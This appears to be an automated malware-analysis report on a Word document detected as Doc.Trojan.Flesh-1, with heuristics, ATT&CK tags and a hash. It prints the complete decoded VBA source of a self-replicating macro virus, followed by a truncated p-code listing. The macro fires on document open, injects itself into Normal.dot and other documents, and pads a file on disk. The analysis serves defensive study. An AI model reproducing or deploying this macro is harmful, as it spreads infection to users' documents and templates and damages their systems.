MALICIOUS
Risk Score: 240
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This document contains a malicious VBA macro, identified by the 'Doc.Trojan.Flesh-1' ClamAV signature. The macro is designed to infect other documents by copying itself into the Normal.dot template and potentially other documents, as indicated by the 'Document_Open' and 'AutoOpen' macro firings. The script attempts to spread by injecting its code into the 'Normal.dot' template, suggesting a self-propagation mechanism.
Heuristics 5
- ClamAV: Doc.Trojan.Flesh-1 (critical) CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Flesh-1
- VBA macros detected (medium, 2 related findings) OLE_VBA_MACROS: Document contains VBA macro code
- AutoOpen macro (high) OLE_VBA_AUTOOPEN: AutoOpen macro
- Document_Open macro (high) OLE_VBA_DOCOPEN: Document_Open macro
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12634 bytes |

SHA-256: 7532647f5a082c277c8fbfe9745834642b77333d7686a0aaaea4f5f421420965
Detection: ClamAV: Doc.Trojan.Flesh-1
Obfuscation or payload: unlikely
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
GoSub Flesh:
'macro code of user
'macro code of user
'macro code of user
'macro code of user
'THIS IS THE ORIGINAL VERSION OF THE PARASIT VIRUS OF LORD Arz
'let's have fun...
Flesh:
If Hook = 1 Then Exit Sub
Owner = ThisDocument.Name
If UCase(Owner) = "NORMAL.DOT" Then Ways = 1 Else Ways = 0
Select Case Ways
Case 0
For c = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(c).CodeModule.Lines(2, 1) = "GoSub Flesh:" Then Set Carrier = ActiveDocument.VBProject.VBComponents(c).CodeModule
Next c
For i = 1 To Carrier.CountOfLines
If Carrier.Lines(i, 1) = "Flesh:" Then
For x = i To Carrier.CountOfLines - 1
VC = VC & Carrier.Lines(x, 1) & Chr(13)
Next x
VC = Left(VC, Len(VC) - 1)
i = x
End If
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
Set ToOwn = NormalTemplate.VBProject.VBComponents(i).CodeModule
If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
If ToOwn.Lines(2, 1) = "GoSub Flesh:" Then GoTo FAllDoneP
For x = 1 To ToOwn.CountOfLines + 1
If Left(ToOwn.Lines(x, 1), 3) = "Sub" Or Left(ToOwn.Lines(x, 1), 10) = "Private Sub" Then ToOwn.InsertLines x + 1, "Gosub Flesh:"
If Left(ToOwn.Lines(x, 1), 7) = "End Sub" Then ToOwn.InsertLines x, VC
Next x
FAllDoneP:
Next i
GoTo DeadFlesh
Case 1
For c = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(c).CodeModule.Lines(2, 1) = "GoSub Flesh:" Then Set Carrier = ActiveDocument.VBProject.VBComponents(c).CodeModule
Next c
For i = 1 To Carrier.CountOfLines
If Carrier.Lines(i, 1) = "Flesh:" Then
For x = i To Carrier.CountOfLines - 1
VC = VC & Carrier.Lines(x, 1) & Chr(13)
Next x
VC = Left(VC, Len(VC) - 1)
i = x
End If
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
Set ToOwn = ActiveDocument.VBProject.VBComponents(i).CodeModule
If ToOwn.CountOfLines <= 1 Then ToOwn.InsertLines 1, "Sub AutoOpen()" & Chr(13) & "'" & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(13) & "End Sub"
If ToOwn.Lines(2, 1) = "GoSub Flesh:" Then GoTo PAllDoneF
For x = 1 To ToOwn.CountOfLines + 1
If Left(ToOwn.Lines(x, 1), 3) = "Sub" Or Left(ToOwn.Lines(x, 1), 10) = "Private Sub" Then ToOwn.InsertLines x + 1, "Gosub Flesh:"
If Left(ToOwn.Lines(x, 1), 7) = "End Sub" Then ToOwn.InsertLines x, VC
Next x
PAllDoneF:
Next i
End Select
DeadFlesh:
EatUp = Int(Rnd * 50000000) + 10000000
Theef = Int(Rnd * 255)
Open "lo.sys" For Binary As #1
Put #1, EatUp, Theef
Close #1
Hook = 1
Return
End Sub
' Processing file: /opt/analyzer/scan_staging/1e84b0b26c20464fbae8cd27e59e25a3.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 15245 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' GoSub Flesh
' BoS 0x0000
' Line #2:
' QuoteRem 0x0000 0x0012 "macro code of user"
' Line #3:
' QuoteRem 0x0000 0x0012 "macro code of user"
' Line #4:
' QuoteRem 0x0000 0x0012 "macro code of user"
' Line #5:
' QuoteRem 0x0000 0x0012 "macro code of user"
' Line #6:
' QuoteRem 0x0000 0x003D "THIS IS THE ORIGINAL VERSION OF THE PARASIT VIRUS OF LORD Arz"
' Line #7:
' QuoteRem 0x0000 0x0011 "let's have fun..."
' Line #8:
' Label Flesh
' Line #9:
' Ld Hook
' LitDI2 0x00
... (truncated)